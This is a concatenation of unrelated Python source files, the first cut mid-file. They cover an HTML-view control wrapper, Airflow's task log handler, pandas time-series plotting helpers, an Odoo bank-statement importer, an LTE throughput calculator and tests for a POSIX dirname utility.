txt=unicode(txt) self._send_w32_msg(DTM_ADDTEXTW, int(plain), txt) def _endofsource(self): self._send_w32_msg(DTM_ENDOFSOURCE) def navigate(self, url): url = unicode(url) self._send_w32_msg(DTM_NAVIGATE, 0, url) def set_zoom_level(self, level): if not level in range(5): raise TypeError, 'level must be in [0,1,2,3,4]' self._send_w32_msg(DTM_ZOOMLEVEL, 0, level) def set_value(self, html): self.clear() self._addtext(html) self._endofsource() def set_text(self, txt): self.clear() self._addtext(txt, True) self._endofsource() def clear(self): self._send_w32_msg(DTM_CLEAR) def enablecontextmenu(self, val=True): self._send_w32_msg(DTM_ENABLECONTEXTMENU, 0, MAKELPARAM(0,int(val))) def enableshrink(self, val=True): self._send_w32_msg(DTM_ENABLESHRINK, 0, MAKELPARAM(0,int(val))) def _InitHTMLControl(): cdll.htmlview.InitHTMLControl(GetModuleHandle(0)) _InitHTMLControl()
# -*- coding: utf-8 -*- # # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. import logging import os import requests from airflow import configuration as conf from airflow.configuration import AirflowConfigException from airflow.utils.file import mkdirs from airflow.utils.helpers import parse_template_string class FileTaskHandler(logging.Handler): """ FileTaskHandler is a python log handler that handles and reads task instance logs. It creates and delegates log handling to `logging.FileHandler` after receiving task instance context. It reads logs from task instance's host machine. """ def __init__(self, base_log_folder, filename_template): """ :param base_log_folder: Base log folder to place logs. :param filename_template: template filename string """ super(FileTaskHandler, self).__init__() self.handler = None self.local_base = base_log_folder self.filename_template, self.filename_jinja_template = \ parse_template_string(filename_template) def set_context(self, ti): """ Provide task_instance context to airflow task handler. :param ti: task instance object """ local_loc = self._init_file(ti) self.handler = logging.FileHandler(local_loc) self.handler.setFormatter(self.formatter) self.handler.setLevel(self.level) def emit(self, record): if self.handler is not None: self.handler.emit(record) def flush(self): if self.handler is not None: self.handler.flush() def close(self): if self.handler is not None: self.handler.close() def _render_filename(self, ti, try_number): if self.filename_jinja_template: jinja_context = ti.get_template_context() jinja_context['try_number'] = try_number return self.filename_jinja_template.render(**jinja_context) return self.filename_template.format(dag_id=ti.dag_id, task_id=ti.task_id, execution_date=ti.execution_date.isoformat(), try_number=try_number) def _read(self, ti, try_number, metadata=None): """ Template method that contains custom logic of reading logs given the try_number. :param ti: task instance record :param try_number: current try_number to read log from :param metadata: log metadata, can be used for steaming log reading and auto-tailing. :return: log message as a string and metadata. """ # Task instance here might be different from task instance when # initializing the handler. Thus explicitly getting log location # is needed to get correct log path. 
log_relative_path = self._render_filename(ti, try_number) location = os.path.join(self.local_base, log_relative_path) log = "" if os.path.exists(location): try: with open(location) as f: log += "*** Reading local file: {}\n".format(location) log += "".join(f.readlines()) except Exception as e: log = "*** Failed to load local log file: {}\n".format(location) log += "*** {}\n".format(str(e)) else: url = os.path.join( "http://{ti.hostname}:{worker_log_server_port}/log", log_relative_path ).format( ti=ti, worker_log_server_port=conf.get('celery', 'WORKER_LOG_SERVER_PORT') ) log += "*** Log file does not exist: {}\n".format(location) log += "*** Fetching from: {}\n".format(url) try: timeout = None # No timeout try: timeout = conf.getint('webserver', 'log_fetch_timeout_sec') except (AirflowConfigException, ValueError): pass response = requests.get(url, timeout=timeout) # Check if the resource was properly fetched response.raise_for_status() log += '\n' + response.text except Exception as e: log += "*** Failed to fetch log file from worker. {}\n".format(str(e)) return log, {'end_of_log': True} def read(self, task_instance, try_number=None, metadata=None): """ Read logs of given task instance from local machine. :param task_instance: task instance object :param try_number: task instance try_number to read logs from. If None it returns all logs separated by try_number :param metadata: log metadata, can be used for steaming log reading and auto-tailing. :return: a list of logs """ # Task instance increments its try number when it starts to run. # So the log for a particular task try will only show up when # try number gets incremented in DB, i.e logs produced the time # after cli run and before try_number + 1 in DB will not be displayed. if try_number is None: next_try = task_instance.next_try_number try_numbers = list(range(1, next_try)) elif try_number < 1: logs = [ 'Error fetching the logs. Try number {} is invalid.'.format(try_number), ] return logs else: try_numbers = [try_number] logs = [''] * len(try_numbers) metadatas = [{}] * len(try_numbers) for i, try_number in enumerate(try_numbers): log, metadata = self._read(task_instance, try_number, metadata) logs[i] += log metadatas[i] = metadata return logs, metadatas def _init_file(self, ti): """ Create log directory and give it correct permissions. :param ti: task instance object :return relative log path of the given task instance """ # To handle log writing when tasks are impersonated, the log files need to # be writable by the user that runs the Airflow command and the user # that is impersonated. This is mainly to handle corner cases with the # SubDagOperator. When the SubDagOperator is run, all of the operators # run under the impersonated user and create appropriate log files # as the impersonated user. However, if the user manually runs tasks # of the SubDagOperator through the UI, then the log files are created # by the user that runs the Airflow command. For example, the Airflow # run command may be run by the `airflow_sudoable` user, but the Airflow # tasks may be run by the `airflow` user. If the log files are not # writable by both users, then it's possible that re-running a task # via the UI (or vice versa) results in a permission error as the task # tries to write to a log file created by the other user. 
relative_path = self._render_filename(ti, ti.try_number) full_path = os.path.join(self.local_base, relative_path) directory = os.path.dirname(full_path) # Create the log file and give it group writable permissions # TODO(aoen): Make log dirs and logs globally readable for now since the SubDag # operator is not compatible with impersonation (e.g. if a Celery executor is used # for a SubDag operator and the SubDag operator has a different owner than the # parent DAG) if not os.path.exists(directory): # Create the directory as globally writable using custom mkdirs # as os.makedirs doesn't set mode properly. mkdirs(directory, 0o777) if not os.path.exists(full_path): open(full_path, "a").close() # TODO: Investigate using 444 instead of 666. os.chmod(full_path, 0o666) return full_path
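# Standalone illustration of the non-Jinja branch of _render_filename() above:
# the configured filename_template is rendered with plain str.format using these
# keys. The template string is an assumption that mirrors the common default of
# this Airflow generation, and the values are made up for the example.
filename_template = "{dag_id}/{task_id}/{execution_date}/{try_number}.log"
print(filename_template.format(
    dag_id="example_dag",
    task_id="example_task",
    execution_date="2018-01-01T00:00:00+00:00",
    try_number=1,
))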
""" Period formatters and locators adapted from scikits.timeseries by Pierre GF Gerard-Marchant & Matt Knox """ #!!! TODO: Use the fact that axis can have units to simplify the process from matplotlib import pylab import numpy as np from pandas import isnull from pandas.tseries.period import Period from pandas.tseries.offsets import DateOffset import pandas.tseries.frequencies as frequencies from pandas.tseries.index import DatetimeIndex import pandas.core.common as com from pandas.tseries.converter import (PeriodConverter, TimeSeries_DateLocator, TimeSeries_DateFormatter) #---------------------------------------------------------------------- # Plotting functions and monkey patches def tsplot(series, plotf, **kwargs): """ Plots a Series on the given Matplotlib axes or the current axes Parameters ---------- axes : Axes series : Series Notes _____ Supports same kwargs as Axes.plot """ # Used inferred freq is possible, need a test case for inferred if 'ax' in kwargs: ax = kwargs.pop('ax') else: import matplotlib.pyplot as plt ax = plt.gca() freq = _get_freq(ax, series) # resample against axes freq if necessary if freq is None: # pragma: no cover raise ValueError('Cannot use dynamic axis without frequency info') else: # Convert DatetimeIndex to PeriodIndex if isinstance(series.index, DatetimeIndex): series = series.to_period(freq=freq) freq, ax_freq, series = _maybe_resample(series, ax, freq, plotf, kwargs) # Set ax with freq info _decorate_axes(ax, freq, kwargs) # how to make sure ax.clear() flows through? if not hasattr(ax, '_plot_data'): ax._plot_data = [] ax._plot_data.append((series, plotf, kwargs)) lines = plotf(ax, series.index._mpl_repr(), series.values, **kwargs) # set date formatter, locators and rescale limits format_dateaxis(ax, ax.freq) # x and y coord info ax.format_coord = lambda t, y: ("t = {0} " "y = {1:8f}".format(Period(ordinal=int(t), freq=ax.freq), y)) return lines def _maybe_resample(series, ax, freq, plotf, kwargs): ax_freq = _get_ax_freq(ax) if ax_freq is not None and freq != ax_freq: if frequencies.is_superperiod(freq, ax_freq): # upsample input series = series.copy() series.index = series.index.asfreq(ax_freq, how='s') freq = ax_freq elif _is_sup(freq, ax_freq): # one is weekly how = kwargs.pop('how', 'last') series = series.resample('D', how=how).dropna() series = series.resample(ax_freq, how=how).dropna() freq = ax_freq elif frequencies.is_subperiod(freq, ax_freq) or _is_sub(freq, ax_freq): _upsample_others(ax, freq, plotf, kwargs) ax_freq = freq else: # pragma: no cover raise ValueError('Incompatible frequency conversion') return freq, ax_freq, series def _get_ax_freq(ax): ax_freq = getattr(ax, 'freq', None) if ax_freq is None: if hasattr(ax, 'left_ax'): ax_freq = getattr(ax.left_ax, 'freq', None) elif hasattr(ax, 'right_ax'): ax_freq = getattr(ax.right_ax, 'freq', None) return ax_freq def _is_sub(f1, f2): return ((f1.startswith('W') and frequencies.is_subperiod('D', f2)) or (f2.startswith('W') and frequencies.is_subperiod(f1, 'D'))) def _is_sup(f1, f2): return ((f1.startswith('W') and frequencies.is_superperiod('D', f2)) or (f2.startswith('W') and frequencies.is_superperiod(f1, 'D'))) def _upsample_others(ax, freq, plotf, kwargs): legend = ax.get_legend() lines, labels = _replot_ax(ax, freq, kwargs) other_ax = None if hasattr(ax, 'left_ax'): other_ax = ax.left_ax if hasattr(ax, 'right_ax'): other_ax = ax.right_ax if other_ax is not None: rlines, rlabels = _replot_ax(other_ax, freq, kwargs) lines.extend(rlines) labels.extend(rlabels) if (legend is not None and 
kwargs.get('legend', True) and len(lines) > 0): title = legend.get_title().get_text() if title == 'None': title = None ax.legend(lines, labels, loc='best', title=title) def _replot_ax(ax, freq, kwargs): data = getattr(ax, '_plot_data', None) ax._plot_data = [] ax.clear() _decorate_axes(ax, freq, kwargs) lines = [] labels = [] if data is not None: for series, plotf, kwds in data: series = series.copy() idx = series.index.asfreq(freq, how='S') series.index = idx ax._plot_data.append(series) lines.append(plotf(ax, series.index._mpl_repr(), series.values, **kwds)[0]) labels.append(com.pprint_thing(series.name)) return lines, labels def _decorate_axes(ax, freq, kwargs): ax.freq = freq xaxis = ax.get_xaxis() xaxis.freq = freq if not hasattr(ax, 'legendlabels'): ax.legendlabels = [kwargs.get('label', None)] else: ax.legendlabels.append(kwargs.get('label', None)) ax.view_interval = None ax.date_axis_info = None def _get_freq(ax, series): # get frequency from data freq = getattr(series.index, 'freq', None) if freq is None: freq = getattr(series.index, 'inferred_freq', None) ax_freq = getattr(ax, 'freq', None) # use axes freq if no data freq if freq is None: freq = ax_freq # get the period frequency if isinstance(freq, DateOffset): freq = freq.rule_code else: freq = frequencies.get_base_alias(freq) freq = frequencies.get_period_alias(freq) return freq # Patch methods for subplot. Only format_dateaxis is currently used. # Do we need the rest for convenience? def format_dateaxis(subplot, freq): """ Pretty-formats the date axis (x-axis). Major and minor ticks are automatically set for the frequency of the current underlying series. As the dynamic mode is activated by default, changing the limits of the x axis will intelligently change the positions of the ticks. """ majlocator = TimeSeries_DateLocator(freq, dynamic_mode=True, minor_locator=False, plot_obj=subplot) minlocator = TimeSeries_DateLocator(freq, dynamic_mode=True, minor_locator=True, plot_obj=subplot) subplot.xaxis.set_major_locator(majlocator) subplot.xaxis.set_minor_locator(minlocator) majformatter = TimeSeries_DateFormatter(freq, dynamic_mode=True, minor_locator=False, plot_obj=subplot) minformatter = TimeSeries_DateFormatter(freq, dynamic_mode=True, minor_locator=True, plot_obj=subplot) subplot.xaxis.set_major_formatter(majformatter) subplot.xaxis.set_minor_formatter(minformatter) pylab.draw_if_interactive()
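# Heavily hedged usage sketch for tsplot() above, written against the same
# pandas generation (PeriodIndex-based plotting). Axes.plot is passed unbound so
# it matches the plotf(ax, x, y, **kwargs) call made inside tsplot; whether this
# actually runs depends on that era's pandas/matplotlib being installed.
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.axes import Axes

series = pd.Series(np.random.randn(24),
                   index=pd.period_range('2000-01', periods=24, freq='M'))
tsplot(series, Axes.plot)
plt.show()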
# -*- coding: utf-8 -*- """Framework for importing bank statement files.""" import logging import base64 from openerp import api, models, fields from openerp.tools.translate import _ from openerp.exceptions import Warning _logger = logging.getLogger(__name__) class AccountBankStatementLine(models.Model): """Extend model account.bank.statement.line.""" _inherit = "account.bank.statement.line" # Ensure transactions can be imported only once (if the import format # provides unique transaction ids) unique_import_id = fields.Char('Import ID', readonly=True, copy=False) _sql_constraints = [ ('unique_import_id', 'unique (unique_import_id)', 'A bank account transactions can be imported only once !') ] class AccountBankStatementImport(models.TransientModel): """Extend model account.bank.statement.""" _name = 'account.bank.statement.import' _description = 'Import Bank Statement' @api.model def _get_hide_journal_field(self): """ Return False if the journal_id can't be provided by the parsed file and must be provided by the wizard. See account_bank_statement_import_qif """ return True journal_id = fields.Many2one( 'account.journal', string='Journal', help='Accounting journal related to the bank statement you\'re ' 'importing. It has be be manually chosen for statement formats which ' 'doesn\'t allow automatic journal detection (QIF for example).') hide_journal_field = fields.Boolean( string='Hide the journal field in the view', compute='_get_hide_journal_field') data_file = fields.Binary( 'Bank Statement File', required=True, help='Get you bank statements in electronic format from your bank ' 'and select them here.') @api.multi def import_file(self): """ Process the file chosen in the wizard, create bank statement(s) and go to reconciliation.""" self.ensure_one() data_file = base64.b64decode(self.data_file) statement_ids, notifications = self.with_context( active_id=self.id)._import_file(data_file) # dispatch to reconciliation interface action = self.env.ref( 'account.action_bank_reconcile_bank_statements') return { 'name': action.name, 'tag': action.tag, 'context': { 'statement_ids': statement_ids, 'notifications': notifications }, 'type': 'ir.actions.client', } @api.model def _import_file(self, data_file): """ Create bank statement(s) from file.""" # The appropriate implementation module returns the required data statement_ids = [] notifications = [] parse_result = self._parse_file(data_file) # Check for old version result, with separate currency and account if isinstance(parse_result, tuple) and len(parse_result) == 3: (currency_code, account_number, statements) = parse_result for stmt_vals in statements: stmt_vals['currency_code'] = currency_code stmt_vals['account_number'] = account_number else: statements = parse_result # Check raw data: self._check_parsed_data(statements) # Import all statements: for stmt_vals in statements: (statement_id, new_notifications) = ( self._import_statement(stmt_vals)) if statement_id: statement_ids.append(statement_id) notifications.append(new_notifications) if len(statement_ids) == 0: raise Warning(_('You have already imported that file.')) return statement_ids, notifications @api.model def _import_statement(self, stmt_vals): """Import a single bank-statement. Return ids of created statements and notifications. 
""" currency_code = stmt_vals.pop('currency_code') account_number = stmt_vals.pop('account_number') # Try to find the bank account and currency in odoo currency_id = self._find_currency_id(currency_code) bank_account_id = self._find_bank_account_id(account_number) if not bank_account_id and account_number: raise Warning(_('Can not find the account number %s.') % account_number) # Find the bank journal journal_id = self._get_journal(currency_id, bank_account_id) # By now journal and account_number must be known if not journal_id: raise Warning(_('Can not determine journal for import.')) # Prepare statement data to be used for bank statements creation stmt_vals = self._complete_statement( stmt_vals, journal_id, account_number) # Create the bank stmt_vals return self._create_bank_statement(stmt_vals) @api.model def _parse_file(self, data_file): """ Each module adding a file support must extends this method. It processes the file if it can, returns super otherwise, resulting in a chain of responsability. This method parses the given file and returns the data required by the bank statement import process, as specified below. - bank statements data: list of dict containing (optional items marked by o) : -o currency code: string (e.g: 'EUR') The ISO 4217 currency code, case insensitive -o account number: string (e.g: 'BE1234567890') The number of the bank account which the statement belongs to - 'name': string (e.g: '000000123') - 'date': date (e.g: 2013-06-26) -o 'balance_start': float (e.g: 8368.56) -o 'balance_end_real': float (e.g: 8888.88) - 'transactions': list of dict containing : - 'name': string (e.g: 'KBC-INVESTERINGSKREDIET 787-5562831-01') - 'date': date - 'amount': float - 'unique_import_id': string -o 'account_number': string Will be used to find/create the res.partner.bank in odoo -o 'note': string -o 'partner_name': string -o 'ref': string """ raise Warning(_( 'Could not make sense of the given file.\n' 'Did you install the module to support this type of file?' 
)) @api.model def _check_parsed_data(self, statements): """ Basic and structural verifications """ if len(statements) == 0: raise Warning(_('This file doesn\'t contain any statement.')) for stmt_vals in statements: if 'transactions' in stmt_vals and stmt_vals['transactions']: return # If we get here, no transaction was found: raise Warning(_('This file doesn\'t contain any transaction.')) @api.model def _find_currency_id(self, currency_code): """ Get res.currency ID.""" if currency_code: currency_ids = self.env['res.currency'].search( [('name', '=ilike', currency_code)]) if currency_ids: return currency_ids[0].id else: raise Warning(_( 'Statement has invalid currency code %s') % currency_code) # if no currency_code is provided, we'll use the company currency return self.env.user.company_id.currency_id.id @api.model def _find_bank_account_id(self, account_number): """ Get res.partner.bank ID """ bank_account_id = None if account_number and len(account_number) > 4: bank_account_ids = self.env['res.partner.bank'].search( [('acc_number', '=', account_number)], limit=1) if bank_account_ids: bank_account_id = bank_account_ids[0].id return bank_account_id @api.model def _get_journal(self, currency_id, bank_account_id): """ Find the journal """ bank_model = self.env['res.partner.bank'] # Find the journal from context, wizard or bank account journal_id = self.env.context.get('journal_id') or self.journal_id.id if bank_account_id: bank_account = bank_model.browse(bank_account_id) if journal_id: if (bank_account.journal_id.id and bank_account.journal_id.id != journal_id): raise Warning( _('The account of this statement is linked to ' 'another journal.')) if not bank_account.journal_id.id: bank_model.write({'journal_id': journal_id}) else: if bank_account.journal_id.id: journal_id = bank_account.journal_id.id # If importing into an existing journal, its currency must be the same # as the bank statement. When journal has no currency, currency must # be equal to company currency. if journal_id and currency_id: journal_obj = self.env['account.journal'].browse(journal_id) if journal_obj.currency: journal_currency_id = journal_obj.currency.id if currency_id != journal_currency_id: # ALso log message with id's for technical analysis: _logger.warn( _('Statement currency id is %d,' ' but journal currency id = %d.'), currency_id, journal_currency_id ) raise Warning(_( 'The currency of the bank statement is not ' 'the same as the currency of the journal !' )) else: company_currency_id = self.env.user.company_id.currency_id.id if currency_id != company_currency_id: # ALso log message with id's for technical analysis: _logger.warn( _('Statement currency id is %d,' ' but company currency id = %d.'), currency_id, company_currency_id ) raise Warning(_( 'The currency of the bank statement is not ' 'the same as the company currency !' )) return journal_id @api.model @api.returns('res.partner.bank') def _create_bank_account( self, account_number, company_id=False, currency_id=False): """Automagically create bank account, when not yet existing.""" try: bank_type = self.env.ref('base.bank_normal') bank_code = bank_type.code except ValueError: bank_code = 'bank' vals_acc = { 'acc_number': account_number, 'state': bank_code, } # Odoo users bank accounts (which we import statement from) have # company_id and journal_id set while 'counterpart' bank accounts # (from which statement transactions originate) don't. 
# Warning : if company_id is set, the method post_write of class # bank will create a journal if company_id: vals = self.env['res.partner.bank'].onchange_company_id(company_id) vals_acc.update(vals.get('value', {})) vals_acc['company_id'] = company_id # When the journal is created at same time of the bank account, we need # to specify the currency to use for the account.account and # account.journal return self.env['res.partner.bank'].with_context( default_currency_id=currency_id, default_currency=currency_id).create(vals_acc) @api.model def _complete_statement(self, stmt_vals, journal_id, account_number): """Complete statement from information passed.""" stmt_vals['journal_id'] = journal_id for line_vals in stmt_vals['transactions']: unique_import_id = line_vals.get('unique_import_id', False) if unique_import_id: line_vals['unique_import_id'] = ( (account_number and account_number + '-' or '') + unique_import_id ) if not line_vals.get('bank_account_id'): # Find the partner and his bank account or create the bank # account. The partner selected during the reconciliation # process will be linked to the bank when the statement is # closed. partner_id = False bank_account_id = False account_number = line_vals.get('account_number') if account_number: bank_model = self.env['res.partner.bank'] banks = bank_model.search( [('acc_number', '=', account_number)], limit=1) if banks: bank_account_id = banks[0].id partner_id = banks[0].partner_id.id else: bank_obj = self._create_bank_account(account_number) bank_account_id = bank_obj and bank_obj.id or False line_vals['partner_id'] = partner_id line_vals['bank_account_id'] = bank_account_id return stmt_vals @api.model def _create_bank_statement(self, stmt_vals): """ Create bank statement from imported values, filtering out already imported transactions, and return data used by the reconciliation widget """ bs_model = self.env['account.bank.statement'] bsl_model = self.env['account.bank.statement.line'] # Filter out already imported transactions and create statement ignored_line_ids = [] filtered_st_lines = [] for line_vals in stmt_vals['transactions']: unique_id = ( 'unique_import_id' in line_vals and line_vals['unique_import_id'] ) if not unique_id or not bool(bsl_model.sudo().search( [('unique_import_id', '=', unique_id)], limit=1)): filtered_st_lines.append(line_vals) else: ignored_line_ids.append(unique_id) statement_id = False if len(filtered_st_lines) > 0: # Remove values that won't be used to create records stmt_vals.pop('transactions', None) for line_vals in filtered_st_lines: line_vals.pop('account_number', None) # Create the statement stmt_vals['line_ids'] = [ [0, False, line] for line in filtered_st_lines] statement_id = bs_model.create(stmt_vals).id # Prepare import feedback notifications = [] num_ignored = len(ignored_line_ids) if num_ignored > 0: notifications += [{ 'type': 'warning', 'message': _("%d transactions had already been imported and " "were ignored.") % num_ignored if num_ignored > 1 else _("1 transaction had already been imported and " "was ignored."), 'details': { 'name': _('Already imported items'), 'model': 'account.bank.statement.line', 'ids': bsl_model.search( [('unique_import_id', 'in', ignored_line_ids)]).ids} }] return statement_id, notifications
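# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the module above): the _parse_file()
# docstring describes the statement dictionary a file-format module is
# expected to return.  The literal below is a minimal, hypothetical example
# of that structure -- every value is invented for illustration -- and the
# small helper only mirrors the "at least one transaction" check performed
# by _check_parsed_data().
# ---------------------------------------------------------------------------

EXAMPLE_PARSED_STATEMENT = {
    'currency_code': 'EUR',            # optional, ISO 4217
    'account_number': 'BE1234567890',  # optional
    'name': '000000123',
    'date': '2013-06-26',
    'balance_start': 8368.56,          # optional
    'balance_end_real': 8888.88,       # optional
    'transactions': [{
        'name': 'KBC-INVESTERINGSKREDIET 787-5562831-01',
        'date': '2013-06-26',
        'amount': -135.25,
        'unique_import_id': '2013-06-26-0001',
        'account_number': 'BE0987654321',  # optional counterpart account
        'ref': '787-5562831-01',           # optional
    }],
}


def example_statement_has_transactions(stmt_vals):
    """Mirror of the structural check in _check_parsed_data()."""
    return bool(stmt_vals.get('transactions'))


assert example_statement_has_transactions(EXAMPLE_PARSED_STATEMENT)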
#!/usr/bin/env python # get throughput # author: Ivan Senin import os import sys import re import numpy as np ignore_imsi_str = "--ignore-imsi" def toThroughputKbps(bytes, seconds): return bytes / 1000.0 * 8 / seconds #------------------------------------------------------------------------------- # RLC #------------------------------------------------------------------------------- def processRlcStats(filename, start_time, ignor_ui_id = False): epochDuration = .200 dlRlcKPIs = np.loadtxt(filename, comments = '%') # rows: 0start 1end 2CellId 3IMSI 4RNTI 5LCID 6nTxPDUs 7TxBytes 8nRxPDUs 9RxBytes delay stdDev min max PduSize stdDev min max totalBytesRx = [.0, .0, .0] totalBytesRxPrev = [.0, .0, .0] maxThroughput = [.0, .0, .0] rlcStartTime = dlRlcKPIs[0 , 0] epochStartTime = [rlcStartTime, rlcStartTime, rlcStartTime] totalDuration = dlRlcKPIs[-1, 1] - dlRlcKPIs[0 , 0] for i in range(dlRlcKPIs.shape[0]): time = dlRlcKPIs[i, 0] if time < start_time: continue ueId = 0 if ignor_ui_id else np.uint32(dlRlcKPIs[i, 3]) - 1 rxBytes = dlRlcKPIs[i, 9] totalBytesRx[ueId] += rxBytes if time >= epochStartTime[ueId] + epochDuration: curThroughput = toThroughputKbps(totalBytesRx[ueId] - totalBytesRxPrev[ueId], time - epochStartTime[ueId]) maxThroughput[ueId] = max(curThroughput, maxThroughput[ueId]) epochStartTime[ueId] = time totalBytesRxPrev[ueId] = totalBytesRx[ueId] print "DlThroughput (RLC) [Kbps]:" print "Ue Id Max (per {0:3} sec) Average".format(epochDuration) number_ues = 1 if ignor_ui_id else 3 throughput1 = 0.0 maxThroughput2 = 0.0 for i in range(number_ues): aveThroughput = toThroughputKbps(totalBytesRx[i], totalDuration) if ignor_ui_id: throughput1 = aveThroughput maxThroughput2 = maxThroughput[i] print "{0:<8}{1:<20}{2:<16}".format(i + 1, maxThroughput[i], aveThroughput) print "" return throughput1, maxThroughput2 #------------------------------------------------------------------------------- # MAC #------------------------------------------------------------------------------- def processMacStats(filename, start_time, ignor_ui_id = False): epochDuration = .400 dlMacKPIs = np.loadtxt(filename, comments = '%') # rows: 0time 1cellId 2IMSI 3frame 4sframe 5RNTI 6mcsTb1 7sizeTb1 mcsTb2 sizeTb2 macStartTime = dlMacKPIs[0, 0] totalBytesRx = [.0, .0, .0] totalBytesRxPrev = [.0, .0, .0] maxThroughput = [.0, .0, .0] epochStartTime = [macStartTime, macStartTime, macStartTime] mcss = [0, 0, 0] mcss_num = [0, 0, 0] for i in range(dlMacKPIs.shape[0]): time = dlMacKPIs[i, 0] if time < start_time: continue ueId = 0 if ignor_ui_id else np.uint32(dlMacKPIs[i, 2]) - 1 mcs = np.uint32(dlMacKPIs[i, 6]) if mcs == 0: continue mcss[ueId] += mcs mcss_num[ueId] += 1 totalBytesRx[ueId] += dlMacKPIs[i, 7] if time >= epochStartTime[ueId] + epochDuration: curThroughput = toThroughputKbps(totalBytesRx[ueId] - totalBytesRxPrev[ueId], time - epochStartTime[ueId]) maxThroughput[ueId] = curThroughput if curThroughput > maxThroughput[ueId] else maxThroughput[ueId] epochStartTime[ueId] = time totalBytesRxPrev[ueId] = totalBytesRx[ueId] totalDuration = dlMacKPIs[-1, 0] - macStartTime print "DlThroughput (MAC) [Kbps]: Received (MAC):" print "Ue Id Max Average [Mb]" number_ues = 1 if ignor_ui_id else 3 for i in range(number_ues): aveThroughput = round(toThroughputKbps(totalBytesRx[i], totalDuration), 3) dataTxRx = round(totalBytesRx[i] / 1024. / 1024. 
, 3) print "{0:<8}{1:<12}{2:<20}{3:<12}{4:<4}".format(i + 1, \ round(maxThroughput[i], 3), \ aveThroughput, \ dataTxRx, \ round(float(mcss[i])/ mcss_num[i], 2)) print "" def is_float(value): try: float(value) return True except ValueError: return False def usage(): print "File name must contain words mac or rlc to process them appropriate\n" print "Usage: throughputCalc.py filepath [start time in same resolution as in file] [", ignore_imsi_str, "]\n" print ignore_imsi_str, ":\tSum statistics" print "Examples:" print "throughputCalc.py DlRlcStats.txt" print "throughputCalc.py ./some_directory/DlMacStats.txt 0.11 ", ignore_imsi_str ,"\n" def main(): argc = len(sys.argv) if argc < 2: usage() return full_path = sys.argv[1] filename = os.path.basename(full_path) is_mac_stats = re.search("mac", filename, re.IGNORECASE) is_rlc_stats = re.search("rlc", filename, re.IGNORECASE) if len(filename) == 0 or (is_mac_stats and is_rlc_stats) or (not is_mac_stats and not is_rlc_stats): usage() return; start_time = float(sys.argv[2]) if argc > 2 and is_float(sys.argv[2]) else float("-NaN") ave_thr = 0.0 max_thr = 0.0 if is_mac_stats: processMacStats(full_path, start_time, ignore_imsi_str in sys.argv) else: ave_thr, max_thr = processRlcStats(full_path, start_time, ignore_imsi_str in sys.argv) if (ave_thr > 0.1): helper_log = open("compAlgo/output/log.log") aveTimeBwSwitches = round(float(helper_log.readline()), 2) switches_count = int(helper_log.readline()) print round(ave_thr, 2), "\t", round(max_thr,2), "\t", switches_count, "\t", aveTimeBwSwitches helper_log.close() main()
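# ---------------------------------------------------------------------------
# Illustrative sketch (separate from the script above): processRlcStats() and
# processMacStats() accumulate RxBytes per UE and, whenever epochDuration
# seconds have elapsed, convert the byte delta into Kbps via
# bytes / 1000 * 8 / seconds to track the peak rate, while the average uses
# the whole trace.  The snippet below reproduces that bookkeeping on a
# made-up constant-rate trace (all numbers are invented).
# ---------------------------------------------------------------------------
import numpy as np


def peak_and_average_kbps(times, rx_bytes, epoch=0.2):
    """Return (peak, average) throughput in Kbps for a single UE trace."""
    total = 0.0
    prev_total = 0.0
    epoch_start = times[0]
    peak = 0.0
    for t, b in zip(times, rx_bytes):
        total += b
        if t >= epoch_start + epoch:
            kbps = (total - prev_total) / 1000.0 * 8 / (t - epoch_start)
            peak = max(peak, kbps)
            epoch_start = t
            prev_total = total
    average = total / 1000.0 * 8 / (times[-1] - times[0])
    return peak, average


_times = np.arange(0.0, 2.0, 0.01)     # 2 s of samples, 10 ms apart
_rx = np.full_like(_times, 1250.0)     # 1250 B every 10 ms, roughly 1 Mbps
_peak_kbps, _avg_kbps = peak_and_average_kbps(_times, _rx)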
""" Tests for POSIX-compatible `dirname`. https://pubs.opengroup.org/onlinepubs/9699919799/utilities/dirname.html """ from helpers import check, check_version, run def test_version(): """Check that we're using Boreutil's implementation.""" assert check_version("dirname") def test_missing_args(): """No args => error of the form `dirname: ...`""" assert run(["dirname"]).stderr.startswith("dirname:") assert run(["dirname"]).returncode > 0 def test_extra_args(): """Too many args => error of the form `dirname: ...`""" assert run(["dirname", "a", "b", "c"]).stderr.startswith("dirname:") assert run(["dirname", "a", "b", "c"]).returncode > 0 def test_help(): """Passing -h or --help => print help text.""" assert run(["dirname", "-h"]).stdout.split(' ')[0] == 'Usage:' assert run(["dirname", "--help"]).stdout.split(' ')[0] == 'Usage:' assert run(["dirname", "-h"]).returncode > 0 assert run(["dirname", "--help"]).returncode > 0 def test_main(): """This was split into the test_step[1-8] functions below.""" pass # Test the various steps: def test_step1(): """1. If string is "//", return a slash.""" assert check(["dirname", "//"]).stdout == "/\n" def test_step2(): """2. If string consists entirely of slashes, return a single slash.""" assert check(["dirname", "////////////////////////////"]).stdout == "/\n" def test_step3(): """3. Remove trailing slashes.""" assert check(["dirname", "/foo//////"]).stdout == "/\n" assert check(["dirname", "/foo/bar//////"]).stdout == "/foo\n" def test_step4(): """4. If there are no slashes, return a dot.""" assert check(["dirname", "owo"]).stdout == ".\n" assert check(["dirname", "."]).stdout == ".\n" def test_step5(): """5. If there are any trailing non-<slash> characters, remove them.""" assert check(["dirname", "/owo/uwu"]).stdout == "/owo\n" def test_step6(): """6. If the remaining string is "//", it is implementation defined whether to skip the remaining steps. We chose _not_ to skip them.""" assert check(["dirname", "//fuck"]).stdout == "/\n" def test_step7(): """7. Remove trailing slashes again.""" assert check(["dirname", "/foo////////bar"]).stdout == "/foo\n" def test_step8(): """8. If the remaining string is empty, return a slash.""" assert check(["dirname", "///"]).stdout == "/\n"
